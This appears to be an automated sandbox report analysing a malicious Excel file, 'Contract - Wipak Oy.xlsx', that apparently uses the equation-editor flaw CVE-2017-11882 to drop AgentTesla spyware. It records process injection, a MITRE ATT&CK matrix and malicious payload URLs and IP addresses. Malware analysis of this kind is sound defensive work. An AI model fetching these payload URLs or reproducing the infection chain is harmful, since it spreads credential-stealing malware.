                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2704Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe TID: 948Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe TID: 2168Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: EQNEDT32.EXEBinary or memory string: 2fhpwWhMzjGGhXHCBPqBT8Ei3z3FkNlhlTNT0KIVi4hgFSqX8fo3TEXqTOtYFYDVy3zW7FoA6fY57dub9xwiMyD8dpsjQy7ApwykvJ8eJ5FEz5NgOodxlNAsgqNYuhOyVdiw5YAEUpBuVqB31kHYMTHMlxqnMlxD8ictG0pBnRluKwCzCKIHnHTr4idFSAg9sf6M7h2nNSO06QMl435wireejcCgpxU6u3Z8IefLPPTzUIYgnT4HoDi1uEut9BIJMOQz
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_038A8C90 mov edx, dword ptr fs:[00000030h]2_2_038A8C90
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 402000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 436000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 438000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 7EFDE008Jump to behavior
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeMemory allocated: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 400000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 536Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exeQueries volume information: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe VolumeInformationJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected AgentTesla
                Source: Yara matchFile source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe PID: 2912, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell_ise.exe PID: 304, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected AgentTesla
                Source: Yara matchFile source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe PID: 2912, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell_ise.exe PID: 304, type: MEMORYSTR

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Scripting                		Path Interception1
                Access Token Manipulation                		1
                Masquerading                		OS Credential Dumping1
                Query Registry                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium11
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts23
                Exploitation for Client Execution                		Boot or Logon Initialization Scripts311
                Process Injection                		1
                Modify Registry                		LSASS Memory11
                Security Software Discovery                		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth13
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)1
                Extra Window Memory Injection                		1
                Disable or Modify Tools                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                Non-Application Layer Protocol                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
                Virtualization/Sandbox Evasion                		NTDS1
                Remote System Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer23
                Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Access Token Manipulation                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common311
                Process Injection                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Scripting                		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
                Software Packing                		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                Extra Window Memory Injection                		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 679189 Sample: Contract - Wipak Oy.xlsx Startdate: 05/08/2022 Architecture: WINDOWS Score: 100 43 Multi AV Scanner detection for domain / URL 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Antivirus detection for URL or domain 2->47 49 11 other signatures 2->49 8 EQNEDT32.EXE 11 2->8         started        13 EXCEL.EXE 7 10 2->13         started        process3 dnsIp4 29 pkusukoharjo.com 136.243.86.20, 443, 49171 HETZNER-ASDE Germany 8->29 23 jhghyftvgyjhjhgjhj...gfrtreaebvcnbnc.exe, PE32 8->23 dropped 25 C:\Users\user\AppData\Local\...\qGTGx[1].exe, PE32 8->25 dropped 51 Office equation editor establishes network connection 8->51 53 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->53 15 jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe 12 8->15         started        27 C:\Users\user\...\~$Contract - Wipak Oy.xlsx, data 13->27 dropped file5 signatures6 process7 dnsIp8 31 cdn.discordapp.com 162.159.129.233, 443, 49172 CLOUDFLARENETUS United States 15->31 33 109.206.241.81, 49173, 80 AWMLTNL Germany 15->33 35 Machine Learning detection for dropped file 15->35 37 Writes to foreign memory regions 15->37 39 Allocates memory in foreign processes 15->39 41 Injects a PE file into a foreign processes 15->41 19 powershell_ise.exe 2 15->19         started        signatures9 process10 process11 21 dw20.exe 4 19->21         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Contract - Wipak Oy.xlsx53%VirustotalBrowse
                Contract - Wipak Oy.xlsx41%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                Contract - Wipak Oy.xlsx100%AviraEXP/CVE-2017-11882.Gen
                Contract - Wipak Oy.xlsx100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exe100%Joe Sandbox ML

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                6.0.powershell_ise.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.ff0000.1.unpack100%AviraHEUR/AGEN.1202427Download File

                Domains

                SourceDetectionScannerLabelLink
                pkusukoharjo.com0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                https://pkusukoharjo.com/y0%Avira URL Cloudsafe
                http://109.206.241.81/htdocs/zTALg.exe19%VirustotalBrowse
                http://109.206.241.81/htdocs/zTALg.exe100%Avira URL Cloudmalware
                http://ocsp.entrust.net030%URL Reputationsafe
                https://pkusukoharjo.com/giving/qGTGx.exej0%Avira URL Cloudsafe
                https://pkusukoharjo.com/giving/qGTGx.exe0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                https://pkusukoharjo.com/0%Avira URL Cloudsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                https://pkusukoharjo.com/giving/qGTGx.exejjC:0%Avira URL Cloudsafe
                http://ocsp.entrust.net0D0%URL Reputationsafe
                http://109.206.241.81P0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                cdn.discordapp.com
                		162.159.129.233
                		truefalse
                  		high
                  pkusukoharjo.com
                  		136.243.86.20
                  		truetrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://109.206.241.81/htdocs/zTALg.exetrue
                  • 19%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://pkusukoharjo.com/giving/qGTGx.exetrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdn.discordapp.com/attachments/1001850193580392480/1002961152617222144/seven.dllfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
